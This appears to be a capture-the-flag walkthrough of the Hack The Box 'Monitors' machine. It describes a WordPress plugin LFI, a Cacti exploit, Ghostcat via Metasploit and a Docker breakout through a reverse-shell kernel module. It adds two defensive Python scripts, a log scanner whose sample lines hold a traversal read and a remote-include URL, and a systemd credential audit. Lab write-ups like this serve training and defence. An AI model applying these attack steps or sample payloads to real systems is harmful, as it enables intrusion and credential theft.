🔎🦶 Enumeration/Foothold

Monitors is a Hard box from HTB created by TheCyberGeek. This box features a WordPress plugin exploit via wp-with-spritz allowing for LFI/RFI, and an internal Docker container running Apache Tomcat. I begin each box by running RustScan. This is bundled into my setup.sh script, which I've mentioned in a few of my other posts. Running RustScan with NMAP filters shows a website available on Port 80. The website states 'Sorry, direct IP access is not allowed' but provides an admin contact email.

admin@monitors.htb email address.


I edit my hosts file and add monitors.htb.


Navigating over to the domain I see a WordPress website. Reviewing the page I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out of date WordPress.


While the scan is running I notice that wp-with-spritz has been detected and that its last update was in 2015.

wp-with-spritz coming up as 2015 being the last update.


A short search later turns up ExploitDB – 44544, which documents an LFI/RFI in the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.

Next I used the LFI (Local File Inclusion) to pull the WP-Config (wp-config.php) file, which stores the database credentials for a WordPress installation. I viewed it as page source, as that tends to look cleaner than the rendered view.

WP-Config file running in source.

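From the defender's side, an include-style `url` parameter like this one is easy to watch for in the web server logs. The Python below is an added example, not code from this write-up or from the plugin: it parses Apache combined-format access lines and flags traversal sequences, sensitive absolute paths, stream wrappers and remote URLs handed to that parameter. The script path under the plugin directory is taken from the ExploitDB entry referenced above; the client IPs, timestamps and log lines are constructed for the demonstration.

```python
"""Flag LFI/RFI attempts against an include-style ``url`` parameter in Apache access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Plugin directory served by WordPress; the script name in the samples comes from ExploitDB 44544.
PLUGIN_DIR = "/wp-content/plugins/wp-with-spritz/"

# Apache "combined" format: client, identd, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
STREAM_WRAPPERS = ("php://", "data:", "expect://", "file://", "phar://")
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/root/", "/home/", "/var/log/")


def classify_target(target):
    """Return 'RFI', 'WRAPPER', 'LFI' or None for one request target (path plus query)."""
    parts = urlsplit(target)
    if not parts.path.startswith(PLUGIN_DIR):
        return None
    values = parse_qs(parts.query).get("url")
    if not values:
        return None
    # parse_qs decoded once already; decode again so %252e%252e (double encoding) is caught too.
    value = unquote(values[0]).lower()
    if value.startswith(REMOTE_SCHEMES):
        return "RFI"
    if value.startswith(STREAM_WRAPPERS):
        return "WRAPPER"
    if "../" in value or "..\\" in value or value.startswith(SENSITIVE_PREFIXES):
        return "LFI"
    return None


def scan_log(text):
    """Return (client, timestamp, verdict, target) for every suspicious request line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        verdict = classify_target(m["target"])
        if verdict:
            findings.append((m["ip"], m["ts"], verdict, m["target"]))
    return findings


# Constructed sample: a benign plugin call, a traversal read, a remote include and an unrelated hit.
SAMPLE_LOG = """\
10.10.14.1 - - [09/Oct/2021:10:00:01 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/wp-content/uploads/2020/article.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.1 - - [09/Oct/2021:10:00:02 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.10.14.1 - - [09/Oct/2021:10:00:03 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http%3A%2F%2F10.10.14.1%2Fremote.txt HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.10.14.1 - - [09/Oct/2021:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, ts, verdict, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {verdict}: {target}")
```

The same `classify_target` check can be applied at request time in a WAF rule or in the plugin itself; the real fix is for the plugin to accept only an identifier it maps to a known post rather than a path or URL.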

I try the credentials to log in to the WordPress admin, but they don't work. I check around a few locations for the next point of escalation. I review the NMAP output and realize the machine is running Apache/2.4.29. I pull 000-default.conf through the LFI to see if the page we saw earlier gives us any additional information, or if any other virtual hosts exist.

Running Apache/2.4.29

An additional VHOST is available.

I add the new host to my hosts file and navigate to the new sub-domain. I try the credentials found earlier in the WP-Config file and log in. It took me a second, as I needed to use admin for the username and not wpadmin.

I navigate around the console looking for a file upload or script option. Next I check the version, which is located at the top right of the page.

Cacti 1.2.12


🔐 Escalation

This leads me to ExploitDB – 49810, which I pull to my Attack VM and run. I fill in the required variables and submit the request, giving me a low-privilege shell.

⚠ Attack Machine (Tab 1)

ExploitDB - 49810 running successfully.

⚠ Attack Machine (Tab 2)

After getting onto the machine and upgrading my shell, I tried to use curl or wget to pull files to the box but was unable to, as neither was installed. Using nc I pulled LinEnum to the box.

🎯 Victim Machine

⚠ Attack Machine

Going through the endless string of results I notice cacti-backup.service. I also notice that the user marcus, who I was trying to escalate to, had a .backup directory.

.backup directory in Marcus' home directory and cacti-backup.service running on the machine.

Reviewing cacti-backup.service I can see that the .backup folder mentioned earlier has a shell script inside it. Viewing the script gives me his credentials. I su to his account, grab the flag and try ssh.

cacti-backup.service showing a backup script running in .backup, and the password for Marcus in backup.sh
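The root cause of this step is a service whose backup script lives in a user's home directory, is readable by other local accounts and carries a password in clear text. As an added example (not the author's code and not LinEnum), the Python below audits systemd unit files for exactly that pattern: it resolves the executables named on Exec* lines, checks whether each script is group- or world-readable, and searches it for credential-looking assignments. It builds a throw-away directory tree that mirrors the layout described above (cacti-backup.service pointing at /home/marcus/.backup/backup.sh); the script contents and the EXAMPLE_PASSWORD value are constructed placeholders, not what is on the box.

```python
"""Audit systemd units for Exec* scripts that other users can read and that embed credentials."""
import os
import re
import shlex
import stat
import tempfile
from pathlib import Path

EXEC_RE = re.compile(r"^Exec(?:Start|StartPre|StartPost|Stop|Reload)\s*=\s*(.+)$", re.MULTILINE)
# Shell-style assignments such as password="..." or api_key: ... (case-insensitive).
SECRET_RE = re.compile(r"(?i)\b(?:passw(?:or)?d|secret|token|api[_-]?key)\b\s*[=:]\s*['\"]?[^\s'\"]+")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}


def exec_paths(unit_text):
    """Executables named by Exec* lines, with systemd's -, @, +, ! and : prefixes stripped."""
    paths = []
    for cmd in EXEC_RE.findall(unit_text):
        argv = shlex.split(cmd)
        if not argv:
            continue
        exe = argv[0].lstrip("-@+!:")
        # For "/bin/bash /path/script.sh" audit the script rather than the interpreter.
        if os.path.basename(exe) in INTERPRETERS and len(argv) > 1 and not argv[1].startswith("-"):
            exe = argv[1]
        paths.append(exe)
    return paths


def audit_unit(unit_path):
    """Return one finding per Exec* script that is group/world readable and contains a secret."""
    findings = []
    for target in exec_paths(Path(unit_path).read_text()):
        script = Path(target)
        if not script.is_file():
            continue
        mode = script.stat().st_mode
        readable_by_others = bool(mode & (stat.S_IRGRP | stat.S_IROTH))
        has_secret = SECRET_RE.search(script.read_text(errors="replace")) is not None
        if readable_by_others and has_secret:
            findings.append({
                "unit": str(unit_path),
                "script": str(script),
                "mode": oct(mode & 0o777),
                "issue": "readable script with hard-coded credential",
            })
    return findings


def build_demo():
    """Create a throw-away tree mirroring the layout on the page; every value here is constructed."""
    root = Path(tempfile.mkdtemp(prefix="unit-audit-"))
    script = root / "home" / "marcus" / ".backup" / "backup.sh"
    script.parent.mkdir(parents=True)
    script.write_text(
        "#!/bin/bash\n"
        "backup_name=\"cacti_backup\"\n"
        "password=\"EXAMPLE_PASSWORD\"  # constructed placeholder, not the box's value\n"
        "mysqldump -u cacti -p\"$password\" cacti > /tmp/$backup_name.sql\n"
    )
    script.chmod(0o755)  # readable by every local account, as described above
    unit = root / "etc" / "systemd" / "system" / "cacti-backup.service"
    unit.parent.mkdir(parents=True)
    unit.write_text(
        "[Unit]\nDescription=Cacti backup\n\n"
        f"[Service]\nType=oneshot\nExecStart=/bin/bash {script}\n\n"
        "[Install]\nWantedBy=multi-user.target\n"
    )
    return unit, script


def demo():
    """Audit the constructed unit before and after tightening the script's permissions."""
    unit, script = build_demo()
    before = audit_unit(unit)
    script.chmod(0o700)  # remediation: only the owning user (and root) can read it
    after = audit_unit(unit)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
```

Tightening the mode is the quick fix; the better one is to take the password out of the script altogether (a root-owned file under /etc with mode 0600 read via `EnvironmentFile=`, or a credential the backup job fetches at run time) so that a low-privilege web-application account never has anything to read.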

I log in with SSH and read the note:

This must be a clue to how I progress. I check the running services, looking for a Docker installation. I notice Port 8443 open, which wasn't visible in the original scan. I use SSH to forward the port to my local host.

Port 8443 open on the local host.

Apache Tomcat/9.0.31 running on the localhost.

Viewing the page does not give me the exploit I was hoping for, but I do notice Apache Tomcat/9.0.31 running, which I know is constantly being exploited. A short Google later shows me that a Metasploit module is available.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit

The first time I ran the exploit it errored and told me to use ForceExploit to override. Doing this allowed me to get a Meterpreter shell.

ForceExploit command used due to local host pivot.


After running the exploit I could see I was root inside the Docker container. I knew the next steps were to escape and escalate. I found this article on HackTricks: hacktricks – Docker Breakout.

Inside the previous output you can see that the SYS_MODULE capability is enabled. Going through the first link led me to a second article focused fully on CAP_SYS_MODULE: hacktricks – CAP_SYS_MODULE. Truthfully this part can be confusing, so just follow the article as best you can.

🎯 Victim Machine

⚠ Attack Machine

Use the copy command (on the website) to copy reverse-shell.c and the Makefile. Edit reverse-shell.c on Line 8 and put in your own IP/Port. Make sure when copying the Makefile that each recipe line starts with a real tab character rather than spaces. When done, launch a web server and pull both files to the machine.

📜 Makefile

📜 reverse-shell.c

After we load reverse-shell.ko inside the Docker container, our reverse shell pops and we are root.

Root on Monitors from HTB.


Rooted

Published On: October 9th, 2021 / Categories: HTB, Technology
